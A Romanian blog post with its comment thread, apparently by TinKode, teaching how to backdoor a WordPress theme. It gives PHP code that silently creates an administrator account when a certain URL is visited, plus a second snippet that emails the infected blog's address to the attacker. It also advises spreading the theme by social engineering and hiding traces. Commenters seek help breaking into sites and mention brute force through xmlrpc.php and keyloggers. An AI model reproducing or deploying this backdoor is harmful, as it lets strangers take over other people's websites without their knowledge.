Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.
Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.
Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator.
add_action('wp_head', 'wp_wordpress'); function wp_wordpress() { if ($_GET['p'] == '1') { require('wp-includes/registration.php'); if (!username_exists('wordpress')) { $user_id = wp_create_user('Guest', 'password'); $user = new WP_User($user_id); $user->set_role('administrator'); } } }
Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.
Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.
Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.
<? add_action('wp_head','wp_wordpressmail'); function wp_wordpressmail(){ if ( is_user_logged_in() ) { if(!username_exists('wordpress')){ $addr='TinKode@domain.tld'; # Aici puneţi adresa voastră de email $judul='WP URL'; wp_mail($addr,$judul,get_bloginfo('wpurl')); } } } ?>
Să vă bucuraţi de metodă. Şi ca să nu vă dea de gol adresa de mail, puteţi să o encriptaţi în base64.
Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă.
Mulțumiri din partea muritorilor de rând!
ReplyDeleteTinKode,ce sistem de operare foloseai cand spargeai servere?
ReplyDeleteIn general toti hackerii folosesc Linux.
DeleteCIOCAN ,DALTA :)))
DeleteHabar nu aveti cate se pot face de pe un simplu sistem de operare cum este windows.
DeleteLa linux treci cand ai de lucru in bash si alte cele ..
Habar nu aveti cate se pot face de pe windows , linux iti trebuie daca ai treaba in Bash sau altceva, desi exista foarte multe alternative si pe windows , nu mai zic de faptul ca daca nu ai ca target servere web , windows-ul este cel mai folosit in ziua de azi pentru accesare mail, cpanel , whm etc ...
Deleteiar despre securizare web , am vazut mai sus ca intreba cineva , ar trebuii mai intai ca sa invete programare sa stie ce face codul si cum ruleaza .
Probabil Back Track (o distributie Linux cu tot felul de tool-uri folosite pentru hacking).
Deletebeni zoldos :))) LINUX PRIETENE.
ReplyDelete"encriptaţi în base64" - hacker language?! :)
ReplyDeleteTinKode ai un id de mess sau gmail ? vreau sa-ti propun ceva
ReplyDeleteCu asta poti fura steam-uri oare :))? Daca formez o pagina php personalizata si pune botu si se logheaza oare ar merge ce zici :> ?
ReplyDeleteAsta se face mult mai simplu in 2021 :) ce zici aici e un simplu phisihig. Manipulezi DOM-ul in asa fel incat sa primesti informatiile din input-urile completate pe o adresa de mail de ex.
DeleteAsa cum a spus intr-un interviu d ela proTV foloseste sistem d eoperare Linus sau Win7... bafta in continuare si incepe sami placa chestile astea cum ai facut Tinkode o sa incerc si eu ceva ...
ReplyDeletesalut,cum pot lua legatura cu tine?
ReplyDeleteo adresa de mail ceva?
Cum pot lua legatura cu tine? un email ceva?
ReplyDeletebacktrack 5
ReplyDeletece programe imi trebuie pentru a face asta? si..cum adica? am programul respectiv si fac o tema(fundal) de blog care are un fel de virusi si eu ii pot ,,infecta'' blogul?? pls help me TINKODE !!
ReplyDeleteun exista programe pt a face asta! iti trebuie cunostinte de PHP si un pic de web design. crezi k cu un click si un generator ai sa spargi siteuri? lol
DeleteSe foloseste de asazisul keylogger , o metoda clasica si eficienta.. dar windows 7 contine windows defender care il gaseste dupa o scanare completa a sistemului ...
ReplyDeletece keyloger ma? lol voi kiar vreti sa vi sa raspunda la intrebarile astea stupide? stii ce e un keyloger?,ai creat vreodata unu?stii vreun limbaj d programmare?tolti vreti sa deveniti hakeri dar unici unu nu stie un pic de c++,PHP,java etc look noobs.
DeletePrietene, daca vrei sa spargi site-uri prin inginerie sociala si nu esti in stare sa urmezi niste instructiuni foarte simplu e timpul sa iti iei calculatorul, sa-l duci in padure, sa-i dai foc, sa stergi urmele si sa te duci inapoi acasa.
ReplyDeleteUn prograam de pentesting foarte bun...Kali linux sau Backtrack5 R3 recomand Kali linux pentru cei care au habar ;)
ReplyDeleteIn ce program scriptezi ? Adica in ce program scri chestile astea
ReplyDeletePHP, html
Delete:))
ReplyDeleteMultumim TinKode , chiar aveam nevoie de un tutorial de genu:) , bafta frate:* si daca mai ai timp nu ne ar deranja sa mai postezi cate ceva:D:D:D
ReplyDeleteNATIUNE DE RAHAT !
ReplyDeleteIn loc sa invatati ceva util care sa deserveasca societatii si sa contribuiti la prosperitatea acesteia, lasand intiparit numele vostru acolo undeva, mandrindu-se de acesta, parintii, fratii, nepotii sau copii vostri, va ocupati de cel mai josnic mod de a viola proprietatea privata. RUSINE !!!
Prietene ... tu vezi de salvarea societății de Rosia Montana etc. și lasă-ne pe noi sa facem ce știm mai bine ... ca iți garantez ca dam mai mult ajutor societății in 2 min si 10 click decât ar putea oferii 1 mil. de al de tine in 5-10 ani. P.S. Te anunț ca "opțiunea'' Anonymous pe care ai ales-o nu iti protejează total identitatea asa ca ai mare atenție la ce mai zici pe aici si pe cine mai critici sunt sigur ca unii abia așteaptă sa te lase o perioada fără net -_-
DeleteBa frate lasa`te dute arunca`te in balta ca e cel mai usor si mai simplu fa drq un keylogger si ai terminat wow... mare cacat ce faci tu aici o.O si asa vezi chiar tot ce face toate conturile te chinui asa faci pur si simplu keylogger si ii zici ca e nush ce... :| te complici atat , o.O lasa`te.
ReplyDeleteDe unde ai reusit sa inveti toate astea ?
ReplyDeletenu merge linkul :(
ReplyDeletenu pot sa intru pe link .... help :D
ReplyDeleteCa tine vreau sa fiu cand o sa fiu mare !
ReplyDeleteMa oameni buni credeti ca numai asta este singura metoda de a "sparge" un site pe Wordpress? :)) da este una din multiplele metode. Mai exista si BruteForce...mda..unii o sa spuneti ca dureaza prea mult insa este destul de eficienta si nu lasa urme mai ales daca folosesti OS bazat pe Linux (nu dau exemplu de distributii pentru ca stiti deja). Asa ca mai ganditi-va si la alte metode nu numai la cea prezentata :)))) :))
ReplyDeleteCrede-ma ... lasa urme ... exista posibilitatea de a stoca IP-ul fiecarei persoane care incearca sa se logheze. Pe langa asta, e foarte simplu sa limitezi numarul de incercari de logare pe ora/zi, whatever, ceea ce face ca BruteForce-ul sa nu mai fie practic deloc...mai ales daca are o parola mai complexa decat 123456
DeletePerfect de acord că se salvează în loguri orice încercare a unuia ce face bruteforce. Dar dacă ne limităm la WordPress sau ceva similar, acea restricţie este egală cu 0 dacă te foloseşti să faci bruteforce prin XMLRPC.php, unde nu există vreo restricţie.
Deleteau auzit si romanii de kali linux :))
ReplyDeleteanon vorbesti de parca ai fii mare hacker tu......!nu te mai da ce nu esti.
ReplyDeleteNu sunt Hacker...nu ma consider unul ci doar am zis ca exista si alte metode de a sparge un site pe wordpress.... Keep KALM and love linux :P
Deletecum pot sa shimb datele unui site?
ReplyDelete...care urme sa le stearga? /var/log/secure.forest???:))
ReplyDeletesalut am o intrebare cum pot scoate comentariile de pe un blog wordpress fara user si fara parola nu injurati recunosc nu ma pricep la treburile astea cu php html si ce mai vorbeati voi mai sus dar am pe cineva care ma mananca de cu.....r pe un blog wordpress si vreau sa scot acele comentarii sau sa sterg blogul detot se poate face ceva fara user si parola
ReplyDeleteSince it is easy to setup and easy to use, it is possible to create static HTML files that are based on the dynamic WordPress blog. This cache plugin also automatically modifies the.htaccess file along with offering a cache timeout feature.tentų gamyba
ReplyDelete